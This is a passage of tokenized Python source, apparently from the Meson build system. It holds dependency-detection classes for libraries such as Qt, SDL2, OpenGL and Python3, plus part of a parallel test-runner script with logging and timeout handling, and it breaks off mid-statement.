<EOL> self . sources = [ self . all_src , self . main_src ] <EOL> else : <EOL> self . sources = [ self . all_src ] <EOL> mlog . log ( '<STR_LIT>' , mlog . green ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> else : <EOL> mlog . log ( '<STR_LIT>' , mlog . red ( '<STR_LIT>' ) ) <EOL> self . is_found = False <EOL> return self . is_found <EOL> def get_compile_args ( self ) : <EOL> arr = [ ] <EOL> if self . include_dir != '<STR_LIT>' : <EOL> arr . append ( '<STR_LIT>' + self . include_dir ) <EOL> arr . append ( '<STR_LIT>' + self . src_include_dir ) <EOL> return arr <EOL> def get_link_args ( self ) : <EOL> return self . link_args <EOL> def get_version ( self ) : <EOL> return '<STR_LIT>' <EOL> def get_sources ( self ) : <EOL> return self . sources <EOL> def need_threads ( self ) : <EOL> return True <EOL> class GMockDependency ( Dependency ) : <EOL> def __init__ ( self , environment , kwargs ) : <EOL> Dependency . __init__ ( self ) <EOL> self . name = '<STR_LIT>' <EOL> self . libname = '<STR_LIT>' <EOL> trial_dirs = mesonlib . get_library_dirs ( ) <EOL> gmock_found = False <EOL> for d in trial_dirs : <EOL> if os . path . isfile ( os . path . join ( d , self . libname ) ) : <EOL> gmock_found = True <EOL> if gmock_found : <EOL> self . is_found = True <EOL> self . compile_args = [ ] <EOL> self . link_args = [ '<STR_LIT>' ] <EOL> self . sources = [ ] <EOL> mlog . log ( '<STR_LIT>' , mlog . green ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> return <EOL> for d in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> if os . path . exists ( d ) : <EOL> self . is_found = True <EOL> self . compile_args = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> self . link_args = [ ] <EOL> all_src = mesonlib . File . from_absolute_file ( os . path . join ( d , '<STR_LIT>' ) ) <EOL> main_src = mesonlib . File . from_absolute_file ( os . path . join ( d , '<STR_LIT>' ) ) <EOL> if kwargs . get ( '<STR_LIT>' , False ) : <EOL> self . sources = [ all_src , main_src ] <EOL> else : <EOL> self . sources = [ all_src ] <EOL> mlog . log ( '<STR_LIT>' , mlog . green ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> return <EOL> mlog . log ( '<STR_LIT>' , mlog . red ( '<STR_LIT>' ) ) <EOL> self . is_found = False <EOL> def get_version ( self ) : <EOL> return '<STR_LIT>' <EOL> def get_compile_args ( self ) : <EOL> return self . compile_args <EOL> def get_sources ( self ) : <EOL> return self . sources <EOL> def get_link_args ( self ) : <EOL> return self . link_args <EOL> def found ( self ) : <EOL> return self . is_found <EOL> class Qt5Dependency ( Dependency ) : <EOL> def __init__ ( self , environment , kwargs ) : <EOL> Dependency . __init__ ( self ) <EOL> self . name = '<STR_LIT>' <EOL> self . root = '<STR_LIT>' <EOL> mods = kwargs . get ( '<STR_LIT>' , [ ] ) <EOL> self . cargs = [ ] <EOL> self . largs = [ ] <EOL> self . is_found = False <EOL> if isinstance ( mods , str ) : <EOL> mods = [ mods ] <EOL> if len ( mods ) == <NUM_LIT:0> : <EOL> raise DependencyException ( '<STR_LIT>' ) <EOL> type_text = '<STR_LIT>' <EOL> if environment . is_cross_build ( ) and kwargs . get ( '<STR_LIT>' , False ) : <EOL> type_text = '<STR_LIT>' <EOL> self . pkgconfig_detect ( mods , environment , kwargs ) <EOL> elif not environment . is_cross_build ( ) and shutil . which ( '<STR_LIT>' ) is not None : <EOL> self . pkgconfig_detect ( mods , environment , kwargs ) <EOL> elif shutil . which ( '<STR_LIT>' ) is not None : <EOL> self . qmake_detect ( mods , kwargs ) <EOL> else : <EOL> self . version = '<STR_LIT:none>' <EOL> if not self . is_found : <EOL> mlog . log ( '<STR_LIT>' % type_text , mlog . red ( '<STR_LIT>' ) ) <EOL> else : <EOL> mlog . log ( '<STR_LIT>' % type_text , mlog . green ( '<STR_LIT>' ) ) <EOL> def pkgconfig_detect ( self , mods , environment , kwargs ) : <EOL> modules = [ ] <EOL> for module in mods : <EOL> modules . append ( PkgConfigDependency ( '<STR_LIT>' + module , environment , kwargs ) ) <EOL> for m in modules : <EOL> self . cargs += m . get_compile_args ( ) <EOL> self . largs += m . get_link_args ( ) <EOL> self . is_found = True <EOL> self . version = modules [ <NUM_LIT:0> ] . modversion <EOL> def qmake_detect ( self , mods , kwargs ) : <EOL> pc = subprocess . Popen ( [ '<STR_LIT>' , '<STR_LIT>' ] , stdout = subprocess . PIPE , <EOL> stderr = subprocess . PIPE ) <EOL> ( stdo , _ ) = pc . communicate ( ) <EOL> if pc . returncode != <NUM_LIT:0> : <EOL> return <EOL> stdo = stdo . decode ( ) <EOL> if not '<STR_LIT>' in stdo : <EOL> mlog . log ( '<STR_LIT>' ) <EOL> return <EOL> self . version = re . search ( '<STR_LIT>' , stdo ) . group ( <NUM_LIT:0> ) <EOL> ( stdo , _ ) = subprocess . Popen ( [ '<STR_LIT>' , '<STR_LIT>' ] , stdout = subprocess . PIPE ) . communicate ( ) <EOL> qvars = { } <EOL> for line in stdo . decode ( ) . split ( '<STR_LIT:\n>' ) : <EOL> line = line . strip ( ) <EOL> if line == '<STR_LIT>' : <EOL> continue <EOL> ( k , v ) = tuple ( line . split ( '<STR_LIT::>' , <NUM_LIT:1> ) ) <EOL> qvars [ k ] = v <EOL> if mesonlib . is_osx ( ) : <EOL> return self . framework_detect ( qvars , mods , kwargs ) <EOL> incdir = qvars [ '<STR_LIT>' ] <EOL> self . cargs . append ( '<STR_LIT>' + incdir ) <EOL> libdir = qvars [ '<STR_LIT>' ] <EOL> bindir = qvars [ '<STR_LIT>' ] <EOL> for module in mods : <EOL> mincdir = os . path . join ( incdir , '<STR_LIT>' + module ) <EOL> self . cargs . append ( '<STR_LIT>' + mincdir ) <EOL> libfile = os . path . join ( libdir , '<STR_LIT>' + module + '<STR_LIT>' ) <EOL> if not os . path . isfile ( libfile ) : <EOL> libfile = os . path . join ( bindir , '<STR_LIT>' + module + '<STR_LIT>' ) <EOL> self . largs . append ( libfile ) <EOL> self . is_found = True <EOL> def framework_detect ( self , qvars , modules , kwargs ) : <EOL> libdir = qvars [ '<STR_LIT>' ] <EOL> for m in modules : <EOL> fname = '<STR_LIT>' + m <EOL> fwdep = ExtraFrameworkDependency ( fname , kwargs . get ( '<STR_LIT>' , True ) , libdir ) <EOL> self . cargs . append ( '<STR_LIT>' + libdir ) <EOL> if fwdep . found ( ) : <EOL> self . is_found = True <EOL> self . cargs += fwdep . get_compile_args ( ) <EOL> self . largs += fwdep . get_link_args ( ) <EOL> def get_version ( self ) : <EOL> return self . version <EOL> def get_compile_args ( self ) : <EOL> return self . cargs <EOL> def get_sources ( self ) : <EOL> return [ ] <EOL> def get_link_args ( self ) : <EOL> return self . largs <EOL> def found ( self ) : <EOL> return self . is_found <EOL> def get_exe_args ( self ) : <EOL> return [ '<STR_LIT>' ] <EOL> class Qt4Dependency ( Dependency ) : <EOL> def __init__ ( self , environment , kwargs ) : <EOL> Dependency . __init__ ( self ) <EOL> self . name = '<STR_LIT>' <EOL> self . root = '<STR_LIT>' <EOL> self . modules = [ ] <EOL> mods = kwargs . get ( '<STR_LIT>' , [ ] ) <EOL> if isinstance ( mods , str ) : <EOL> mods = [ mods ] <EOL> for module in mods : <EOL> self . modules . append ( PkgConfigDependency ( '<STR_LIT>' + module , environment , kwargs ) ) <EOL> if len ( self . modules ) == <NUM_LIT:0> : <EOL> raise DependencyException ( '<STR_LIT>' ) <EOL> def get_version ( self ) : <EOL> return self . modules [ <NUM_LIT:0> ] . get_version ( ) <EOL> def get_compile_args ( self ) : <EOL> args = [ ] <EOL> for m in self . modules : <EOL> args += m . get_compile_args ( ) <EOL> return args <EOL> def get_sources ( self ) : <EOL> return [ ] <EOL> def get_link_args ( self ) : <EOL> args = [ ] <EOL> for module in self . modules : <EOL> args += module . get_link_args ( ) <EOL> return args <EOL> def found ( self ) : <EOL> for i in self . modules : <EOL> if not i . found ( ) : <EOL> return False <EOL> return True <EOL> class GnuStepDependency ( Dependency ) : <EOL> def __init__ ( self , environment , kwargs ) : <EOL> Dependency . __init__ ( self ) <EOL> self . modules = kwargs . get ( '<STR_LIT>' , [ ] ) <EOL> self . detect ( ) <EOL> def detect ( self ) : <EOL> confprog = '<STR_LIT>' <EOL> try : <EOL> gp = subprocess . Popen ( [ confprog , '<STR_LIT>' ] , <EOL> stdout = subprocess . PIPE , stderr = subprocess . PIPE ) <EOL> gp . communicate ( ) <EOL> except FileNotFoundError : <EOL> self . args = None <EOL> mlog . log ( '<STR_LIT>' , mlog . red ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> return <EOL> if gp . returncode != <NUM_LIT:0> : <EOL> self . args = None <EOL> mlog . log ( '<STR_LIT>' , mlog . red ( '<STR_LIT>' ) ) <EOL> return <EOL> if '<STR_LIT>' in self . modules : <EOL> arg = '<STR_LIT>' <EOL> else : <EOL> arg = '<STR_LIT>' <EOL> fp = subprocess . Popen ( [ confprog , '<STR_LIT>' ] , <EOL> stdout = subprocess . PIPE , stderr = subprocess . PIPE ) <EOL> ( flagtxt , flagerr ) = fp . communicate ( ) <EOL> flagtxt = flagtxt . decode ( ) <EOL> flagerr = flagerr . decode ( ) <EOL> if fp . returncode != <NUM_LIT:0> : <EOL> raise DependencyException ( '<STR_LIT>' % ( flagtxt , flagerr ) ) <EOL> args = flagtxt . split ( ) <EOL> self . args = self . filter_arsg ( args ) <EOL> fp = subprocess . Popen ( [ confprog , arg ] , <EOL> stdout = subprocess . PIPE , stderr = subprocess . PIPE ) <EOL> ( libtxt , liberr ) = fp . communicate ( ) <EOL> libtxt = libtxt . decode ( ) <EOL> liberr = liberr . decode ( ) <EOL> if fp . returncode != <NUM_LIT:0> : <EOL> raise DependencyException ( '<STR_LIT>' % ( libtxt , liberr ) ) <EOL> self . libs = self . weird_filter ( libtxt . split ( ) ) <EOL> mlog . log ( '<STR_LIT>' , mlog . green ( '<STR_LIT>' ) ) <EOL> def weird_filter ( self , elems ) : <EOL> """<STR_LIT>""" <EOL> return [ e for e in elems if e . startswith ( '<STR_LIT:->' ) ] <EOL> def filter_arsg ( self , args ) : <EOL> """<STR_LIT>""" <EOL> result = [ ] <EOL> for f in args : <EOL> if f . startswith ( '<STR_LIT>' ) or f . startswith ( '<STR_LIT>' ) or f . startswith ( '<STR_LIT>' ) or f == '<STR_LIT>' or ( f . startswith ( '<STR_LIT>' ) and not f == '<STR_LIT>' ) : <EOL> result . append ( f ) <EOL> return result <EOL> def found ( self ) : <EOL> return self . args is not None <EOL> def get_compile_args ( self ) : <EOL> if self . args is None : <EOL> return [ ] <EOL> return self . args <EOL> def get_link_args ( self ) : <EOL> return self . libs <EOL> class AppleFrameworks ( Dependency ) : <EOL> def __init__ ( self , environment , kwargs ) : <EOL> Dependency . __init__ ( self ) <EOL> modules = kwargs . get ( '<STR_LIT>' , [ ] ) <EOL> if isinstance ( modules , str ) : <EOL> modules = [ modules ] <EOL> if len ( modules ) == <NUM_LIT:0> : <EOL> raise DependencyException ( "<STR_LIT>" ) <EOL> self . frameworks = modules <EOL> def get_link_args ( self ) : <EOL> args = [ ] <EOL> for f in self . frameworks : <EOL> args . append ( '<STR_LIT>' ) <EOL> args . append ( f ) <EOL> return args <EOL> def found ( self ) : <EOL> return mesonlib . is_osx ( ) <EOL> class GLDependency ( Dependency ) : <EOL> def __init__ ( self , environment , kwargs ) : <EOL> Dependency . __init__ ( self ) <EOL> self . is_found = False <EOL> self . cargs = [ ] <EOL> self . linkargs = [ ] <EOL> try : <EOL> pcdep = PkgConfigDependency ( '<STR_LIT>' , environment , kwargs ) <EOL> if pcdep . found ( ) : <EOL> self . is_found = True <EOL> self . cargs = pcdep . get_compile_args ( ) <EOL> self . linkargs = pcdep . get_link_args ( ) <EOL> return <EOL> except Exception : <EOL> pass <EOL> if mesonlib . is_osx ( ) : <EOL> self . is_found = True <EOL> self . linkargs = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> return <EOL> if mesonlib . is_windows ( ) : <EOL> self . is_found = True <EOL> self . linkargs = [ '<STR_LIT>' ] <EOL> return <EOL> def get_link_args ( self ) : <EOL> return self . linkargs <EOL> class SDL2Dependency ( Dependency ) : <EOL> def __init__ ( self , environment , kwargs ) : <EOL> Dependency . __init__ ( self ) <EOL> self . is_found = False <EOL> self . cargs = [ ] <EOL> self . linkargs = [ ] <EOL> sdlconf = shutil . which ( '<STR_LIT>' ) <EOL> if sdlconf : <EOL> pc = subprocess . Popen ( [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> stdout = subprocess . PIPE , <EOL> stderr = subprocess . DEVNULL ) <EOL> ( stdo , _ ) = pc . communicate ( ) <EOL> self . cargs = stdo . decode ( ) . strip ( ) . split ( ) <EOL> pc = subprocess . Popen ( [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> stdout = subprocess . PIPE , <EOL> stderr = subprocess . DEVNULL ) <EOL> ( stdo , _ ) = pc . communicate ( ) <EOL> self . linkargs = stdo . decode ( ) . strip ( ) . split ( ) <EOL> self . is_found = True <EOL> mlog . log ( '<STR_LIT>' , mlog . bold ( '<STR_LIT>' ) , '<STR_LIT>' , mlog . green ( '<STR_LIT>' ) , '<STR_LIT>' % sdlconf ) <EOL> return <EOL> try : <EOL> pcdep = PkgConfigDependency ( '<STR_LIT>' , kwargs ) <EOL> if pcdep . found ( ) : <EOL> self . is_found = True <EOL> self . cargs = pcdep . get_compile_args ( ) <EOL> self . linkargs = pcdep . get_link_args ( ) <EOL> return <EOL> except Exception : <EOL> pass <EOL> if mesonlib . is_osx ( ) : <EOL> fwdep = ExtraFrameworkDependency ( '<STR_LIT>' , kwargs . get ( '<STR_LIT>' , True ) ) <EOL> if fwdep . found ( ) : <EOL> self . is_found = True <EOL> self . cargs = fwdep . get_compile_args ( ) <EOL> self . linkargs = fwdep . get_link_args ( ) <EOL> return <EOL> mlog . log ( '<STR_LIT>' , mlog . bold ( '<STR_LIT>' ) , '<STR_LIT>' , mlog . red ( '<STR_LIT>' ) ) <EOL> def get_compile_args ( self ) : <EOL> return self . cargs <EOL> def get_link_args ( self ) : <EOL> return self . linkargs <EOL> def found ( self ) : <EOL> return self . is_found <EOL> class ExtraFrameworkDependency ( Dependency ) : <EOL> def __init__ ( self , name , required , path = None ) : <EOL> Dependency . __init__ ( self ) <EOL> self . name = None <EOL> self . detect ( name , path ) <EOL> if self . found ( ) : <EOL> mlog . log ( '<STR_LIT>' , mlog . bold ( name ) , '<STR_LIT>' , mlog . green ( '<STR_LIT>' ) , <EOL> os . path . join ( self . path , self . name ) ) <EOL> else : <EOL> mlog . log ( '<STR_LIT>' , name , '<STR_LIT>' , mlog . red ( '<STR_LIT>' ) ) <EOL> def detect ( self , name , path ) : <EOL> lname = name . lower ( ) <EOL> if path is None : <EOL> paths = [ '<STR_LIT>' ] <EOL> else : <EOL> paths = [ path ] <EOL> for p in paths : <EOL> for d in os . listdir ( p ) : <EOL> fullpath = os . path . join ( p , d ) <EOL> if lname != d . split ( '<STR_LIT:.>' ) [ <NUM_LIT:0> ] . lower ( ) : <EOL> continue <EOL> if not stat . S_ISDIR ( os . stat ( fullpath ) . st_mode ) : <EOL> continue <EOL> self . path = p <EOL> self . name = d <EOL> return <EOL> def get_compile_args ( self ) : <EOL> if self . found ( ) : <EOL> return [ '<STR_LIT>' + os . path . join ( self . path , self . name , '<STR_LIT>' ) ] <EOL> return [ ] <EOL> def get_link_args ( self ) : <EOL> if self . found ( ) : <EOL> return [ '<STR_LIT>' + self . path , '<STR_LIT>' , self . name . split ( '<STR_LIT:.>' ) [ <NUM_LIT:0> ] ] <EOL> return [ ] <EOL> def found ( self ) : <EOL> return self . name is not None <EOL> class ThreadDependency ( Dependency ) : <EOL> def __init__ ( self , environment , kwargs ) : <EOL> super ( ) . __init__ ( ) <EOL> self . name = '<STR_LIT>' <EOL> self . is_found = True <EOL> mlog . log ( '<STR_LIT>' , mlog . bold ( self . name ) , '<STR_LIT>' , mlog . green ( '<STR_LIT>' ) ) <EOL> def need_threads ( self ) : <EOL> return True <EOL> class Python3Dependency ( Dependency ) : <EOL> def __init__ ( self , environment , kwargs ) : <EOL> super ( ) . __init__ ( ) <EOL> self . name = '<STR_LIT>' <EOL> self . is_found = False <EOL> try : <EOL> pkgdep = PkgConfigDependency ( '<STR_LIT>' , environment , kwargs ) <EOL> if pkgdep . found ( ) : <EOL> self . cargs = pkgdep . cargs <EOL> self . libs = pkgdep . libs <EOL> self . is_found = True <EOL> return <EOL> except Exception : <EOL> pass <EOL> if not self . is_found : <EOL> if mesonlib . is_windows ( ) : <EOL> inc = sysconfig . get_path ( '<STR_LIT>' ) <EOL> platinc = sysconfig . get_path ( '<STR_LIT>' ) <EOL> self . cargs = [ '<STR_LIT>' + inc ] <EOL> if inc != platinc : <EOL> self . cargs . append ( '<STR_LIT>' + platinc ) <EOL> basedir = sysconfig . get_config_var ( '<STR_LIT>' ) <EOL> vernum = sysconfig . get_config_var ( '<STR_LIT>' ) <EOL> self . libs = [ '<STR_LIT>' . format ( basedir ) , <EOL> '<STR_LIT>' . format ( vernum ) ] <EOL> self . is_found = True <EOL> elif mesonlib . is_osx ( ) : <EOL> fw = ExtraFrameworkDependency ( '<STR_LIT>' , False ) <EOL> if fw . found ( ) : <EOL> self . cargs = fw . get_compile_args ( ) <EOL> self . libs = fw . get_link_args ( ) <EOL> self . is_found = True <EOL> if self . is_found : <EOL> mlog . log ( '<STR_LIT>' , mlog . bold ( self . name ) , '<STR_LIT>' , mlog . green ( '<STR_LIT>' ) ) <EOL> else : <EOL> mlog . log ( '<STR_LIT>' , mlog . bold ( self . name ) , '<STR_LIT>' , mlog . red ( '<STR_LIT>' ) ) <EOL> def get_compile_args ( self ) : <EOL> return self . cargs <EOL> def get_link_args ( self ) : <EOL> return self . libs <EOL> def get_dep_identifier ( name , kwargs ) : <EOL> elements = [ name ] <EOL> modlist = kwargs . get ( '<STR_LIT>' , [ ] ) <EOL> if isinstance ( modlist , str ) : <EOL> modlist = [ modlist ] <EOL> for module in modlist : <EOL> elements . append ( module ) <EOL> return '<STR_LIT:/>' . join ( elements ) + '<STR_LIT>' + str ( kwargs . get ( '<STR_LIT>' , False ) ) + '<STR_LIT>' + str ( kwargs . get ( '<STR_LIT>' , False ) ) <EOL> def find_external_dependency ( name , environment , kwargs ) : <EOL> required = kwargs . get ( '<STR_LIT>' , True ) <EOL> if not isinstance ( required , bool ) : <EOL> raise DependencyException ( '<STR_LIT>' ) <EOL> lname = name . lower ( ) <EOL> if lname in packages : <EOL> dep = packages [ lname ] ( environment , kwargs ) <EOL> if required and not dep . found ( ) : <EOL> raise DependencyException ( '<STR_LIT>' % name ) <EOL> return dep <EOL> pkg_exc = None <EOL> pkgdep = None <EOL> try : <EOL> pkgdep = PkgConfigDependency ( name , environment , kwargs ) <EOL> if pkgdep . found ( ) : <EOL> return pkgdep <EOL> except Exception as e : <EOL> pkg_exc = e <EOL> if mesonlib . is_osx ( ) : <EOL> fwdep = ExtraFrameworkDependency ( name , required ) <EOL> if required and not fwdep . found ( ) : <EOL> raise DependencyException ( '<STR_LIT>' % name ) <EOL> return fwdep <EOL> if pkg_exc is not None : <EOL> raise pkg_exc <EOL> mlog . log ( '<STR_LIT>' , mlog . bold ( name ) , '<STR_LIT>' , mlog . red ( '<STR_LIT>' ) ) <EOL> return pkgdep <EOL> packages = { '<STR_LIT>' : BoostDependency , <EOL> '<STR_LIT>' : GTestDependency , <EOL> '<STR_LIT>' : GMockDependency , <EOL> '<STR_LIT>' : Qt5Dependency , <EOL> '<STR_LIT>' : Qt4Dependency , <EOL> '<STR_LIT>' : GnuStepDependency , <EOL> '<STR_LIT>' : AppleFrameworks , <EOL> '<STR_LIT>' : WxDependency , <EOL> '<STR_LIT>' : SDL2Dependency , <EOL> '<STR_LIT>' : GLDependency , <EOL> '<STR_LIT>' : ThreadDependency , <EOL> '<STR_LIT>' : Python3Dependency , <EOL> } </s>
<s> import mesonbuild <EOL> import sys , os , subprocess , time , datetime , pickle , multiprocessing , json <EOL> import concurrent . futures as conc <EOL> import argparse <EOL> import platform <EOL> import signal <EOL> def is_windows ( ) : <EOL> platname = platform . system ( ) . lower ( ) <EOL> return platname == '<STR_LIT>' or '<STR_LIT>' in platname <EOL> collected_logs = [ ] <EOL> error_count = <NUM_LIT:0> <EOL> options = None <EOL> parser = argparse . ArgumentParser ( ) <EOL> parser . add_argument ( '<STR_LIT>' , default = None , dest = '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , default = None , dest = '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , default = None , dest = '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , default = True , dest = '<STR_LIT>' , action = '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , default = False , action = '<STR_LIT:store_true>' , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_argument ( '<STR_LIT:args>' , nargs = '<STR_LIT:+>' ) <EOL> class TestRun ( ) : <EOL> def __init__ ( self , res , returncode , should_fail , duration , stdo , stde , cmd ) : <EOL> self . res = res <EOL> self . returncode = returncode <EOL> self . duration = duration <EOL> self . stdo = stdo <EOL> self . stde = stde <EOL> self . cmd = cmd <EOL> self . should_fail = should_fail <EOL> def get_log ( self ) : <EOL> res = '<STR_LIT>' <EOL> if self . cmd is None : <EOL> res += '<STR_LIT>' <EOL> else : <EOL> res += '<STR_LIT:U+0020>' . join ( self . cmd ) + '<STR_LIT:\n>' <EOL> if self . stdo : <EOL> res += '<STR_LIT>' <EOL> res += self . stdo <EOL> if self . stde : <EOL> if res [ - <NUM_LIT:1> : ] != '<STR_LIT:\n>' : <EOL> res += '<STR_LIT:\n>' <EOL> res += '<STR_LIT>' <EOL> res += self . stde <EOL> if res [ - <NUM_LIT:1> : ] != '<STR_LIT:\n>' : <EOL> res += '<STR_LIT:\n>' <EOL> res += '<STR_LIT>' <EOL> return res <EOL> def decode ( stream ) : <EOL> try : <EOL> return stream . decode ( '<STR_LIT:utf-8>' ) <EOL> except UnicodeDecodeError : <EOL> return stream . decode ( '<STR_LIT>' , errors = '<STR_LIT:ignore>' ) <EOL> def write_json_log ( jsonlogfile , test_name , result ) : <EOL> jresult = { '<STR_LIT:name>' : test_name , <EOL> '<STR_LIT>' : result . stdo , <EOL> '<STR_LIT:result>' : result . res , <EOL> '<STR_LIT>' : result . duration , <EOL> '<STR_LIT>' : result . returncode , <EOL> '<STR_LIT>' : result . cmd } <EOL> if result . stde : <EOL> jresult [ '<STR_LIT>' ] = result . stde <EOL> jsonlogfile . write ( json . dumps ( jresult ) + '<STR_LIT:\n>' ) <EOL> def run_with_mono ( fname ) : <EOL> if fname . endswith ( '<STR_LIT>' ) and not is_windows ( ) : <EOL> return True <EOL> return False <EOL> def run_single_test ( wrap , test ) : <EOL> global options <EOL> if test . fname [ <NUM_LIT:0> ] . endswith ( '<STR_LIT>' ) : <EOL> cmd = [ '<STR_LIT>' , '<STR_LIT>' ] + test . fname <EOL> elif not test . is_cross and run_with_mono ( test . fname [ <NUM_LIT:0> ] ) : <EOL> cmd = [ '<STR_LIT>' ] + test . fname <EOL> else : <EOL> if test . is_cross : <EOL> if test . exe_runner is None : <EOL> cmd = None <EOL> else : <EOL> cmd = [ test . exe_runner ] + test . fname <EOL> else : <EOL> cmd = test . fname <EOL> if len ( wrap ) > <NUM_LIT:0> and '<STR_LIT>' in wrap [ <NUM_LIT:0> ] : <EOL> wrap += test . valgrind_args <EOL> if cmd is None : <EOL> res = '<STR_LIT>' <EOL> duration = <NUM_LIT:0.0> <EOL> stdo = '<STR_LIT>' <EOL> stde = None <EOL> returncode = - <NUM_LIT:1> <EOL> else : <EOL> cmd = wrap + cmd + test . cmd_args <EOL> starttime = time . time ( ) <EOL> child_env = os . environ . copy ( ) <EOL> child_env . update ( test . env ) <EOL> if len ( test . extra_paths ) > <NUM_LIT:0> : <EOL> child_env [ '<STR_LIT>' ] = child_env [ '<STR_LIT>' ] + '<STR_LIT:;>' . join ( [ '<STR_LIT>' ] + test . extra_paths ) <EOL> if is_windows ( ) : <EOL> setsid = None <EOL> else : <EOL> setsid = os . setsid <EOL> p = subprocess . Popen ( cmd , <EOL> stdout = subprocess . PIPE , <EOL> stderr = subprocess . PIPE if options and options . split else subprocess . STDOUT , <EOL> env = child_env , <EOL> cwd = test . workdir , <EOL> preexec_fn = setsid ) <EOL> timed_out = False <EOL> try : <EOL> ( stdo , stde ) = p . communicate ( timeout = test . timeout ) <EOL> except subprocess . TimeoutExpired : <EOL> timed_out = True <EOL> if is_windows ( ) : <EOL> subprocess . call ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , str ( p . pid ) ] ) <EOL> else : <EOL> os . killpg ( os . getpgid ( p . pid ) , signal . SIGKILL ) <EOL> ( stdo , stde ) = p . communicate ( ) <EOL> endtime = time . time ( ) <EOL> duration = endtime - starttime <EOL> stdo = decode ( stdo ) <EOL> if stde : <EOL> stde = decode ( stde ) <EOL> if timed_out : <EOL> res = '<STR_LIT>' <EOL> elif ( not test . should_fail and p . returncode == <NUM_LIT:0> ) or ( test . should_fail and p . returncode != <NUM_LIT:0> ) : <EOL> res = '<STR_LIT:OK>' <EOL> else : <EOL> res = '<STR_LIT>' <EOL> returncode = p . returncode <EOL> return TestRun ( res , returncode , test . should_fail , duration , stdo , stde , cmd ) <EOL> def print_stats ( numlen , tests , name , result , i , logfile , jsonlogfile ) : <EOL> global collected_logs , error_count , options <EOL> startpad = '<STR_LIT:U+0020>' * ( numlen - len ( '<STR_LIT>' % ( i + <NUM_LIT:1> ) ) ) <EOL> num = '<STR_LIT>' % ( startpad , i + <NUM_LIT:1> , len ( tests ) ) <EOL> padding1 = '<STR_LIT:U+0020>' * ( <NUM_LIT> - len ( name ) ) <EOL> padding2 = '<STR_LIT:U+0020>' * ( <NUM_LIT:8> - len ( result . res ) ) <EOL> result_str = '<STR_LIT>' % ( num , name , padding1 , result . res , padding2 , result . duration ) <EOL> print ( result_str ) <EOL> result_str += "<STR_LIT>" + result . get_log ( ) <EOL> if ( result . returncode != <NUM_LIT:0> ) != result . should_fail : <EOL> error_count += <NUM_LIT:1> <EOL> if options . print_errorlogs : <EOL> collected_logs . append ( result_str ) <EOL> logfile . write ( result_str ) <EOL> write_json_log ( jsonlogfile , name , result ) <EOL> def drain_futures ( futures ) : <EOL> for i in futures : <EOL> ( result , numlen , tests , name , i , logfile , jsonlogfile ) = i <EOL> print_stats ( numlen , tests , name , result . result ( ) , i , logfile , jsonlogfile ) <EOL> def filter_tests ( suite , tests ) : <EOL> if suite is None : <EOL> return tests <EOL> return [ x for x in tests if suite in x . suite ] <EOL> def run_tests ( datafilename ) : <EOL> global options <EOL> logfile_base = '<STR_LIT>' <EOL> if options . wrapper is None : <EOL> wrap = [ ] <EOL> logfilename = logfile_base + '<STR_LIT>' <EOL> jsonlogfilename = logfile_base + '<STR_LIT>' <EOL> else : <EOL> wrap = [ options . wrapper ] <EOL> logfilename = logfile_base + '<STR_LIT:->' + options . wrapper . replace ( '<STR_LIT:U+0020>' , '<STR_LIT:_>' ) + '<STR_LIT>' <EOL> jsonlogfilename = logfile_base + '<STR_LIT:->' + options . wrapper . replace ( '<STR_LIT:U+0020>' , '<STR_LIT:_>' ) + '<STR_LIT>' <EOL> logfile = open ( logfilename , '<STR_LIT:w>' ) <EOL> jsonlogfile = open ( jsonlogfilename , '<STR_LIT:w>' ) <EOL> logfile . write ( '<STR_LIT>' % datetime . datetime . now ( ) . isoformat ( ) ) <EOL> tests = pickle . load ( open ( datafilename , '<STR_LIT:rb>' ) ) <EOL> if len ( tests ) == <NUM_LIT:0> : <EOL> print ( '<STR_LIT>' ) <EOL> return <EOL> numlen = len ( '<STR_LIT>' % len ( tests ) ) <EOL> varname = '<STR_LIT>' <EOL> if varname in os . environ : <EOL> try : <EOL> num_workers = int ( os . environ [ varname ] ) <EOL> except ValueError : <EOL> print ( '<STR_LIT>' % varname ) <EOL> num_workers = <NUM_LIT:1> <EOL> else : <EOL> num_workers = multiprocessing . cpu_count ( ) <EOL> executor = conc . ThreadPoolExecutor ( max_workers = num_workers ) <EOL> futures = [ ] <EOL> filtered_tests = filter_tests ( options . suite , tests ) <EOL> for i , test in enumerate ( filtered_tests ) : <EOL> if test . suite [ <NUM_LIT:0> ] == '<STR_LIT>' : <EOL> visible_name = test . name <EOL> else : <EOL> if options . suite is not None : <EOL> visible_name = options . suite + '<STR_LIT>' + test . name <EOL> else : <EOL> visible_name = test . suite [ <NUM_LIT:0> ] + '<STR_LIT>' + test . name <EOL> if not test . is_parallel : <EOL> drain_futures ( futures ) <EOL> futures = [ ] <EOL> res = run_single_test ( wrap , test ) <EOL> print_stats ( numlen , filtered_tests , visible_name , res , i , logfile , jsonlogfile ) <EOL> else : <EOL> f = executor . submit ( run_single_test , wrap , test ) <EOL> futures . append ( ( f , numlen , filtered_tests , visible_name , i , logfile , jsonlogfile ) ) <EOL> drain_futures ( futures ) <EOL> return logfilename <EOL> def run ( args ) : <EOL> global collected_logs , error_count , options <EOL> collected_logs = [ ] <EOL> error_count = <NUM_LIT:0> <EOL> options = parser . parse_args ( args ) <EOL> if len ( options . args ) != <NUM_LIT:1> : <EOL> print ( '<STR_LIT>' ) <EOL> print ( '<STR_LIT>' % sys . argv [ <NUM_LIT:0> ] ) <EOL> if options . wd is not None : <EOL> os . chdir ( options . wd ) <EOL> datafile = options . args [ <NUM_LIT:0> ] <EOL> logfilename = run_tests ( datafile ) <EOL> if len ( collected_logs ) > 